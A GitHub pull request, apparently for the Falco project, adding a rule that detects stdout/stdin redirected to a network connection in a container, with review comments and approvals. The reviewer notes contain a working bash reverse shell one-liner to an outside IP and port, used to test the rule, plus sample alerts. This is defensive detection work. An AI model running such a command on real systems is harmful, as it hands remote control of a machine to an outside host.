Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

rule update: add a rule to detect reverse shell #1152

Merged
merged 2 commits into from
Apr 21, 2020
Merged

rule update: add a rule to detect reverse shell #1152

merged 2 commits into from
Apr 21, 2020

Conversation

Kaizhe
Copy link
Contributor

@Kaizhe Kaizhe commented Apr 17, 2020
edited
Loading

Signed-off-by: kaizhe derek0405@gmail.com

What type of PR is this?

Uncomment one (or more) /kind <> lines:

/kind bug

/kind cleanup

/kind design

/kind documentation

/kind failing-test

/kind feature

If contributing rules or changes to rules, please make sure to also uncomment one of the following line:

/kind rule-update

/kind rule-create

Any specific area of the project related to this PR?

Uncomment one (or more) /area <> lines:

/area build

/area engine

/area examples

/area rules

/area integrations

/area tests

/area proposals

What this PR does / why we need it:
Detect reverse shell connection from a container.

Which issue(s) this PR fixes:

Fixes #

Special notes for your reviewer:
/bin/bash -i >& /dev/tcp/34.204.xxx.xxx/1234 0>&1 -- reverse shell execution

18:27:10.379958969: Warning Reverse shell connection (user=root nginx (id=bb52e96baba9) process=bash parent=bash cmdline=bash terminal=34816 container_id=bb52e96baba9 image=nginx fd.name=172.17.0.2:50190->34.204.205.146:1234 fd.num=1 fd.type=ipv4 fd.sip=34.204.205.146)
18:27:10.379959879: Warning Reverse shell connection (user=root nginx (id=bb52e96baba9) process=bash parent=bash cmdline=bash terminal=34816 container_id=bb52e96baba9 image=nginx fd.name=172.17.0.2:50190->34.204.205.146:1234 fd.num=1 fd.type=ipv4 fd.sip=34.204.205.146)

Does this PR introduce a user-facing change?:

rule(Redirect STDOUT/STDIN to Network Connection in Container): new rule to detect Redirect stdout/stdin to network connection in container

@Kaizhe
rule update: add a rule to detect reverse shell
93f65dd 
Signed-off-by: kaizhe <derek0405@gmail.com>
@poiana poiana requested review from fntlnz and mfdii April 17, 2020 18:52
@poiana poiana added the size/XS label Apr 17, 2020
@Kaizhe Kaizhe requested review from mstemm and removed request for mfdii April 20, 2020 20:12
mstemm
mstemm requested changes Apr 20, 2020
View reviewed changes
rules/falco_rules.yaml Outdated
@@ -2795,7 +2795,12 @@
priority: WARNING
tags: [network]


- rule: Reverse shell
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Can you make the rule name more specific to the actual behavior, something like "redirecting stdout to network connection in container"? There could be all kinds of reverse shells that don't use this technique.

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Done. Thanks!

@Kaizhe
rename rule
cb4f0b9 
Signed-off-by: kaizhe <derek0405@gmail.com>
@poiana poiana added the lgtm label Apr 21, 2020
@poiana
Copy link

poiana commented Apr 21, 2020

LGTM label has been added.

Git tree hash: 080e7989d2774ea938d72f736b8895a691bcca04

@poiana
Copy link

poiana commented Apr 21, 2020

[APPROVALNOTIFIER] This PR is APPROVED

This pull-request has been approved by: fntlnz, mstemm

The full list of commands accepted by this bot can be found here.

The pull request process is described here

Needs approval from an approver in each of these files:

Approvers can indicate their approval by writing /approve in a comment
Approvers can cancel approval by writing /approve cancel in a comment

@fntlnz
Copy link
Contributor

fntlnz commented Apr 21, 2020

Great work, thanks @Kaizhe

@poiana poiana merged commit f7ac7f3 into master Apr 21, 2020
@poiana poiana deleted the kh_add-rule-reverse-shell branch April 21, 2020 17:04
@leodido leodido added this to the 0.23.0 milestone Apr 22, 2020
@fntlnz
Copy link
Contributor

fntlnz commented Apr 24, 2020

@Kaizhe I updated the description to let it work correctly in the changelog.

@Kaizhe
Copy link
Contributor Author

Kaizhe commented Apr 24, 2020

Thanks a lot @fntlnz !

@alacuku alacuku mentioned this pull request Jun 20, 2022
Merged
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@fntlnz fntlnz fntlnz approved these changes

@mstemm mstemm mstemm approved these changes

Assignees

@fntlnz fntlnz

@mstemm mstemm

Labels
approved dco-signoff: yes lgtm release-note size/XS
Projects
None yet
Milestone
0.23.0
Development

Successfully merging this pull request may close these issues.

None yet
5 participants
@Kaizhe @poiana @fntlnz @mstemm @leodido